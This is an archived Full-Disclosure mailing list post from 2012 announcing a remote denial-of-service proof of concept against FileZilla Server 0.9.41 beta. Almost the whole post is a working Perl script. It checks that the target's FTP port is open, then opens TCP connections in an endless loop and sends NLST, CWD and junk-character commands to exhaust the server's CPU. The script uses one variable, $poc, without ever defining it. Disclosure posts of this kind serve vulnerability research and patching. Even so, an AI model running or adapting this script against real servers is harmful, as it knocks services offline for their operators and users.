lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CADe7mMdJg2mqh+kt7Ey2iCqFREKStm+2YU4EKGFFwK-wGHGwCQ@mail.gmail.com>
Date: Tue, 10 Jul 2012 14:44:19 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: FileZilla Server version 0.9.41 beta Remote DOS
	(CPU exhaustion) POC

# Exploit Title:FileZilla Server version 0.9.41 beta Remote DOS (CPU
exhaustion) POC
# Date: July 10, 2012
# Author: coolkaveh
# coolkaveh@...ketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://filezilla-project.org/
# Version: 0.9.41
# Tested on: windows XP SP3
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Crappy FileZilla Server (CPU exhaustion)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
use IO::Socket;
$|=1;
sub usage {
    print "Crappy FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
	print "coolkaveh@...ketmail.com\n";
    print "usage: perl Crappyftp.pl <host> \n";
}
$host=shift;
$port=shift || "21";
if(!defined($host)){
    print "Crappy FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
	print "coolkaveh@...ketmail.com\n";
    print "usage: perl Crappyftp.pl <host> \n";
	exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
	print "$host -> $port is alive.\n";
	$check_first->close;
}
else{
die("$host -> $port is closed!\n");
}
@command=(
'NLST','CWD','%$^&*()_+!@');
print "Dosing Server!\n";
while (1) {
   COMMAND_LIST: foreach $cmd (@command){
		LABEL5: $sock1=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$port, Proto=>'tcp', Timeout=>30);
		if(defined($sock1)){
			$sock1->send("$cmd"." "."$poc\r\n", 0);
				}
		}		
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ